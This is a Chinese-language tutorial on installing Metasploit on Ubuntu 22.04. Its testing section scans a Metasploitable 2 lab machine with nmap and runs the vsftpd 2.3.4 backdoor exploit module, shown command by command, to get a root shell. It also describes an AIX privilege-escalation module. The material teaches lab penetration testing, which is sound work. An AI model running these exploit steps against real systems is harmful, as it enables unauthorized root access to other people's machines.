作为网络管理员,扫描安全漏洞并尽快修补它们非常重要。Metasploit 是一个开源框架,可帮助识别威胁和漏洞。它发现并利用计算机系统、网络和应用程序中的漏洞。它允许安全专业人员模拟真实世界的攻击并测试组织的安全状况。它带有许多漏洞,还允许您创建自己的漏洞。
在本教程中,您将学习如何安装 Metasploit 框架并在 Ubuntu 22.04 系统上进行基本测试。
先决条件
- 运行 Ubuntu 22.04 且至少具有 4 GB RAM 的计算机。
- 具有 sudo 权限的非 root 用户。
- 简单的防火墙 (UFW) 已启用并运行。
- 一切都已更新。
$ sudo apt update && sudo apt upgrade
- 您的系统需要的软件包很少。
$ sudo apt install wget curl nano ufw software-properties-common dirmngr apt-transport-https gnupg2 ca-certificates lsb-release ubuntu-keyring unzip -y
其中一些软件包可能已经安装在您的系统上。
第 1 步 – 安装 Nmap
Metasploit 需要的最常见的工具之一是 Nmap,不幸的是,它不包含在源代码中。我们可以使用其源代码安装它,也可以安装二进制文件,这是一个相当更新的版本。我们将使用 Ubuntu 包存储库来安装 Nmap 二进制文件。
$ sudo apt install -y nmap
我们将向您展示安装Metasploit的三种方法。第一种方法是使用 Nightly 安装程序 shell 脚本。第二种方法是通过编译源代码来安装它。第三种方法是直接获取 Deb 包并用它来安装 Metasploit。无论您使用哪种方式,您都需要先安装 Nmap,因为它不随 Metapsploit 一起提供。
第 2 步 – 使用 Nightly Installer 安装 Metasploit
使用 Nightly 安装程序脚本安装 Metasploit 非常容易。它附带了 Ruby 和 PostgreSQL 9.2,并与 APT 包管理器集成。
创建一个临时目录以下载 Metasploit 安装程序脚本并切换到该目录。
$ mkdir msf-install && cd ./msf-install
下载安装程序脚本并将文件重命名为 msfinstall
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
在脚本上设置 755 权限。
$ chmod 755 msfinstall
运行脚本。
$ sudo ./msfinstall
该脚本将首先从 Metasploit 的服务器导入签名密钥,然后将 Metasploit 的存储库地址复制到目录中 /etc/apt/sources.list.d/
,最后使用 APT 下载并安装 Metasploit 软件包并为其设置 PATH 变量。
运行 Metasploit 控制台脚本以启动。
$ cd ~
$ msfconsole
首次使用该脚本时,它将启动安装向导,并询问您是否要创建新数据库。
** Welcome to Metasploit Framework Initial Setup **
Please answer a few questions to get started.
Would you like to use and setup a new database (recommended)? y
键入 y
,然后按 Enter 键继续。这将创建一个数据库并将其数据存储在目录中 ~/.msf4/db
Running the 'init' command for the database:
Creating database at /home/navjot/.msf4/db
Creating db socket file at /tmp
Starting database at /home/navjot/.msf4/db...server starting
success
Creating database users
Writing client authentication configuration file /home/navjot/.msf4/db/pg_hba.conf
Stopping database at /home/navjot/.msf4/db
Starting database at /home/navjot/.msf4/db...server starting
success
Creating initial database schema
Database initialization successful
** Metasploit Framework Initial Setup Complete **
然后,您将被带到Metasploit控制台,该控制台应如下所示。
Metasploit tip: Use the analyze command to suggest runnable modules for
hosts
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v6.4.1-dev- ]
+ -- --=[ 2405 exploits - 1239 auxiliary - 422 post ]
+ -- --=[ 1465 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
检查数据库状态。
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
这确认它已正确连接到 PostgreSQL 数据库并且工作正常。
退出控制台。
msf6 > exit
第 3 步 – 使用源代码安装 Metasploit
安装必备组件
安装 Metasploit 所需的软件包。
$ sudo apt install -y autoconf bison build-essential gpgv2 libaprutil1 libgmp3-dev libpcap-dev libpq-dev libreadline-dev libsqlite3-dev libssl-dev locate libsvn1 libtool libxml2-dev libxslt1-dev libyaml-dev libncurses-dev xsel zlib1g-dev
安装 Git。它可能已在您的服务器上可用。
$ sudo apt install -y git
安装 PostgreSQL
安装 PostgreSQL。默认情况下,Ubuntu 22.04 附带了 PostgreSQL 14,这就是我们将使用的。
$ sudo apt install -y postgresql postgresql-contrib
检查 PostgreSQL 服务的状态。
$ sudo systemctl status postgresql
您应该会看到以下输出,确认 PostgreSQL 正在运行。
? postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; enabled; vendor preset: enabled)
Active: active (exited) since Mon 2024-04-01 14:22:31 UTC; 7s ago
Process: 5984 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 5984 (code=exited, status=0/SUCCESS)
CPU: 1ms
Apr 01 14:22:31 metasploit systemd[1]: Starting PostgreSQL RDBMS...
Apr 01 14:22:31 metasploit systemd[1]: Finished PostgreSQL RDBMS.
配置 PostgreSQL
切换到 PostgreSQL 用户。
$ sudo -i -u postgres
为 Metasploit 创建 PostgreSQL 角色。系统将提示您设置密码。
$ createuser msfuser -S -R -P
为 Metasploit 创建一个 PostgreSQL 数据库,并将所有者设置为我们创建的用户。
$ createdb msfdb -O msfuser
退出 PostgreSQL 帐户。
$ exit
打开 /etc/postgresql/14/main/pg_hba.conf 文件进行编辑。
$ sudo nano /etc/postgresql/14/main/pg_hba.conf
将以下行添加到该 host all all 127.0.0.1/32 scram-sha-256
行的下方。
....
host all all 127.0.0.1/32 scram-sha-256
host "msfdb" "msfuser" 127.0.0.1/32 md5
完成后按 Ctrl + X 并在出现提示时输入 Y 来保存文件。
安装 Ruby 版本管理器 (RVM)
Metasploit 需要 Ruby 进行安装。我们将使用 Ruby 版本管理器 (RVM) 来安装 Ruby 和 Gem。
导入 RVM GPG 密钥。
$ gpg2 --keyserver hkp://keyserver.ubuntu.com --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB
使用 curl 下载 RVM 安装脚本。
$ \curl -sSL https://get.rvm.io -o rvm.sh
安装 RVM 的稳定版本。
$ cat rvm.sh | bash -s stable
从安装 RVM 脚本的目录获取 RVM 脚本。
$ source ~/.rvm/scripts/rvm
下载 Metasploit
切换到主目录。
$ cd ~
从 GitHub 下载 Metasploit 的源代码。
$ git clone https://github.com/rapid7/metasploit-framework.git
切换到 Metasploit 目录。
$ cd metasploit-framework
切换到目录时,您将看到以下说明。
Required ruby-3.0.5 is not installed.
To install do: 'rvm install "ruby-3.0.5"'
这提到 Metasploit 框架所需的 Ruby 版本是 3.0.5。您还可以通过运行以下命令来确认它。
$ cat .ruby-version
3.0.5
安装 Ruby
这是它变得棘手的部分。Ubuntu 22.04 支持 OpenSSL 3,而 Ruby 3.0.x 仅适用于 OpenSSL 1.1。这意味着我们不能以通常的方式安装它。最好的解决方法是下载 OpenSSL 1.1 的源代码,构建它,并使用它来安装 Ruby。这不会影响服务器上的任何其他应用程序。
获取 OpenSSL 1.1。您可以从 OpenSSL 1.1 源页面查看可用的最新版本。
$ wget https://www.openssl.org/source/old/1.1.1/openssl-1.1.1w.tar.gz
解压缩下载的存档。
$ tar zxf openssl-1.1.1w.tar.gz
切换到解压的目录。
$ cd openssl-1.1.1w
配置源。
$ ./config --prefix=$HOME/.openssl/openssl-1.1.1w --openssldir=$HOME/.openssl/openssl-1.1.1w
运行 make 命令。
$ make
再次运行 make 命令以执行测试。
$ make tests
安装 OpenSSL 1.1.1w。
$ make install
将 SSL 证书目录配置为指向该 /etc/ssl/certs
目录并删除原始目录。
$ rm -rf ~/.openssl/openssl-1.1.1w/certs
$ ln -s /etc/ssl/certs ~/.openssl/openssl-1.1.1w/certs
切换回 Metasploit 目录。
$ cd ~/metasploit-framework
安装 Ruby。
$ rvm install "ruby-3.0.5" --with-openssl-dir=$HOME/.openssl/openssl-1.1.1w
Checking requirements for ubuntu.
Installing requirements for ubuntu.
Updating system
Installing required packages: libffi-dev, libgdbm-dev, libncurses5-dev, sqlite3.....
........................
Install of ruby-3.0.5 - #complete
Ruby was built without documentation, to build it run: rvm docs generate-ri
安装 Metasploit
切换到 Metasploit 目录。
$ cd ~/metasploit-framework
安装打包程序 Gem。
$ gem install bundler
安装必要的 Ruby Gem。
$ bundle install
启动 Metasploit 控制台。
$ ./msfconsole
您应该会看到类似的输出。
Metasploit tip: You can use help to view all available commands
__________________
< Shells are cool. >
------------------
\
\
\
\
\ ?????????
???????????
????????????
???????????????
??????????????????
?????????????????????
???????????????????????
???????????????????????
?????????????????????
???????????????????????? ??????
?????????????????????? ????????????
?????????????????? ??????????????
????????????????????????????????????
??????????????????? ????????
??????????????????? ?????? ?
?????????????????? ?? ????
???????????????? ???
?????? ????????? ?
??????? ????????
??????? ?????????
????????? ?????????
????????? ??????????
??????? ???????
=[ metasploit v6.4.2-dev-44ba1b5082 ]
+ -- --=[ 2408 exploits - 1240 auxiliary - 422 post ]
+ -- --=[ 1465 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
测试数据库连接。
msf6 > db_status
[*] postgresql selected, no connection
连接到我们之前创建的数据库。
msf6 > db_connect msfuser:yourmsfpassword@127.0.0.1:5432/msfdb
[*] Connected to Postgres data service: 127.0.0.1/msfdb
验证数据库状态。
msf6 > db_status
[*] Connected to msfdb. Connection type: postgresql. Connection name: local_db_service.
退出控制台。
msf6 > exit
配置 Metasploit 数据库设置
在重复使用 Metasploit 控制台期间,数据库连接不会持续存在。要使它永久化,我们需要将其保存到 ~/.msf4
目录中的文件中。
在 ~/.msf4/
目录中创建一个文件 database.yml
。
$ touch ~/.msf4/database.yml
打开它进行编辑。
$ nano ~/.msf4/database.yml
将以下代码粘贴到其中。
production:
adapter: postgresql
database: msfdb
username: msfuser
password: [PASSWORD]
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
完成后按 Ctrl + X 并在出现提示时输入 Y 来保存文件。
再次启动控制台。
$ ./msfconsole
检查数据库连接状态。
msf6 > db_status
[*] Connected to msfdb. Connection type: postgresql.
这确认 Metasploit 已成功连接到 PostgreSQL 数据库。
第 4 步 – 使用 Binary 包安装 Metasploit
访问 Metasploit 的 APT 存储库页面,并从页面底部获取最新 Metasploit deb 包的 URL。在撰写本文时,最新的可用版本是 6.4.1+20240326102606。
使用命令 wget
下载包。
$ wget https://apt.metasploit.com/pool/main/m/metasploit-framework/metasploit-framework_6.4.1%2B20240326102606~1rapid7-1_amd64.deb
安装软件包。
$ sudo dpkg -i metasploit-framework_6.4.1+20240326102606~1rapid7-1_amd64.deb
通过运行 Metasploit 控制台命令继续安装。
$ msfconsole
以与步骤 1 相同的方式继续完成 Metasploit 的安装。
第 5 步 – 测试 Metasploit
您在启动 Metasploit 控制台时看到的顶部横幅可能会很刺耳,可以使用该 -q
选项将其关闭。
$ msfconsole -q
这样,您将被直接带到控制台。
msf6 >
要列出所有可用命令,请在控制台上运行 help
。
msf6 > help
您将获得以下输出。
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
debug Display information useful for debugging
exit Exit the console
features Display the list of not yet released features that can be opted in to
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
.........................................................................
若要列出所有可用的漏洞,请运行以下命令。
msf6 > show exploits
您应该获得类似的输出。
Metasploit 还通过以下命令提供特定于工具的文档。您可以使用它来了解有关特定漏洞的工作原理的更多信息。我们将检查漏洞 xorg_x11_server
利用的工作原理。
msf6 > info xorg_x11_server
您将获得以下输出。
msf6 > info exploit/aix/local/xorg_x11_server
Name: Xorg X11 Server Local Privilege Escalation
Module: exploit/aix/local/xorg_x11_server
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2018-10-25
Provided by:
Narendra Shinde
Zack Flack <dzflack@gmail.com>
Module side effects:
config-changes
Available targets:
Id Name
-- ----
0 IBM AIX Version 6.1
=> 1 IBM AIX Version 7.1
2 IBM AIX Version 7.2
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
WritableDir /tmp yes A directory where we can write files
Payload information:
Description:
WARNING: Successful execution of this module results in /etc/passwd being overwritten.
This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root
privileges.
This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
Due to permission restrictions of the crontab in AIX, this module does not use cron,
and instead overwrites /etc/passwd in order to create a new user with root privileges.
All currently logged in users need to be included when /etc/passwd is overwritten,
else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
overwriting /etc/passwd.
...................................
让我们使用 Metasploit 检查受感染机器上的打开端口。在本教程中,我们将使用 Metasploitable 虚拟机。这是一台测试机器,可用于学习目的。我们正在使用 Metasploitable 2,它带有一个可下载的 VirtualBox 硬盘驱动器,您可以使用它来设置虚拟机,这是我们用来执行测试的。您还可以使用 Metasploitable 3,这是一款基于 Vagrant 的 VirtualBox 机器,需要不同类型的安装。
使用 Nmap 工具扫描打开的端口。
msf6 > nmap -sV 192.168.31.36
您应该会看到类似的输出,具体取决于您正在检查的计算机。
msf6 > nmap -sV 192.168.31.36
[*] exec: nmap -sV 192.168.31.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 12:23 IST
Nmap scan report for 192.168.31.36
Host is up (0.0046s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.57 seconds
现在,我们已经有了要利用的开放端口列表,让我们使用其中一个端口。我们将使用该 vsftpd
服务进行利用。在此之前,让我们在我们的漏洞利用列表中搜索它以了解有关它的更多信息。
msf6 > search vsftpd
您将收到以下输出。
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor
接下来,我们可以复制漏洞利用的名称并使用以下命令使用它。此命令可让我们进入漏洞利用。
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
您将获得以下输出。
[*] No payload configured, defaulting to cmd/unix/interact
控制台提示将更改为以下内容。
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
接下来,使用该 show options
命令检查漏洞利用要求。
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
您将获得以下输出。
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
在这里,您可以看到某些变量的当前设置。 RHOSTS
在输出中指定远程主机 IP 并 RPORT
引用远程主机端口。将此漏洞的远程主机 IP 设置为正常工作。这将告诉它要针对哪台机器。
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.31.36 RHOSTS => 192.168.31.36
现在,远程主机IP已配置完毕,我们可以继续进行黑客攻击。运行命令 exploit
并等待黑客继续进行。
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
您应该会看到以下输出。
[*] 192.168.31.36:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.31.36:21 - USER: 331 Please specify the password.
[+] 192.168.31.36:21 - Backdoor service has been spawned, handling...
[+] 192.168.31.36:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.31.10:46765 -> 192.168.31.36:6200) at 2024-04-03 12:37:46 +0530
您应该能够键入任何命令,它将在目标系统上工作,确认黑客攻击。若要确认,请使用命令 ifconfig
获取网络详细信息。ifconfig
您将获得以下输出,显示输出来自目标计算机,这意味着我们的漏洞利用有效。
eth0 Link encap:Ethernet HWaddr 08:00:27:88:8d:ae
inet addr:192.168.31.36 Bcast:192.168.31.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe88:8dae/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1671 errors:0 dropped:0 overruns:0 frame:0
TX packets:1529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:145408 (142.0 KB) TX bytes:142342 (139.0 KB)
Base address:0xd020 Memory:f0200000-f0220000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:274 errors:0 dropped:0 overruns:0 frame:0
TX packets:274 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:109881 (107.3 KB) TX bytes:109881 (107.3 KB)
这只是Metasploit可以做的事情之一。您可以使用它做更多的事情来查找漏洞,并找出哪些机器是开放的并且容易受到攻击并修补它们。
第 6 步 – 更新 Metasploit
Metasploit 带有其更新脚本。如果您使用步骤 2 和步骤 4 进行安装,则只需运行以下命令即可更新 Metasploit。
$ sudo msfupdate
此外,相同的两种方法配置了 APT 存储库,因此您不需要运行脚本。每次运行 sudo apt update && sudo apt upgrade
时,Metasploit 都会更新。
如果您从源代码安装了 Metasploit,则必须手动更新它。切换到 Metasploit 框架目录。
$ cd ~/metasploit-framework
首先,为 Git 设置一些变量。这只是一个一次性的过程。
$ git config --global user.name "YourName"
$ git config --global user.email "name@example.com"
现在,您可以使用以下命令运行更新。
$ ./msfupdate
为了避免反复运行此命令,您可以设置一个 cron 作业来自动更新它。运行以下命令以启动 Crontab 编辑器。
$ crontab -e
系统将询问您使用哪个编辑器。
no crontab for navjot - using an empty one
Select an editor. To change later, run 'select-editor'.
1. /bin/nano <---- easiest
2. /usr/bin/vim.basic
3. /usr/bin/vim.tiny
4. /bin/ed
Choose 1-4 [1]: 1
如果要使用 nano 编辑器,请选择 1。这就是我们将使用的。
接下来,粘贴以下代码以启用 Metasploit 的自动更新。
0 1 * * * /home/<username>/metasploit-framework/msfupdate > /dev/null 2>&1
这将在每天凌晨 1 点运行更新脚本。完成后按 Ctrl + X 并在出现提示时输入 Y 来保存文件。
就是这样。这将使您的Metasploit在没有任何干预的情况下保持更新。
步骤 7 – 卸载 Metasploit
如果使用步骤 2 或 4 安装了 Metasploit,则要删除 Metasploit,只需运行以下命令。
$ sudo apt autoremove --purge metasploit-framework
但是,如果您使用 source 安装它,那么要删除 Metasploit,您需要运行一系列命令。
$ rm -Rf ~/.rvm
$ rm -Rf ~/.gem
$ rm -f ~/.gemrc
$ rm -Rf ~/.bundle
$ rm -f ~/rvm.sh
$ rm -rf ~/.local/share/gem
打开 .bashrc
文件进行编辑。
$ nano ~/.bashrc
从文件底部删除以下行。
# Add RVM to PATH for scripting. Make sure this is the last PATH variable change.
export PATH="$PATH:$HOME/.rvm/bin"
最后但并非最不重要的一点是,如果您没有用处,请将其删除。
完成后按 Ctrl + X 并在出现提示时输入 Y 来保存文件。
打开 .bash_profile
进行编辑。
$ nano ~/,bash_profile
从文件底部删除以下行。
[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
完成后按 Ctrl + X 并在出现提示时输入 Y 来保存文件。
打开 .profile
文件进行编辑。
$ nano ~/.profile
从文件底部删除以下代码。
# Add RVM to PATH for scripting. Make sure this is the last PATH variable change.
export PATH="$PATH:$HOME/.rvm/bin"
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
完成后按 Ctrl + X 并在出现提示时输入 Y 来保存文件。
获取文件以重新加载更改。
$ source ~/.bashrc
$ source ~/.bash_profile
$ source ~/.profile
删除 Metasploit 目录。
$ rm -rf ~/metasploit-framework
$ rm -rf ~/.msf4
如果您不再需要 PostgreSQL,请卸载它。
$ sudo apt autoremove --purge postgresql postgresql-contrib
卸载 OpenSSL 1.1.1。以下命令将卸载软件包、清理目录并删除下载的存档。
$ cd ~/openssl-1.1.1w
$ make uninstall
$ cd ~/
$ rm -rf ./openssl-1.1.1w
$ rm openssl-1.1.1w.tar.gz
结论
关于在 Ubuntu 22.04 系统上安装 Metasploit 框架以及如何执行一些基本操作的教程到此结束。如果您有任何问题,请在下面的评论中发布。
请登录后发表评论
注册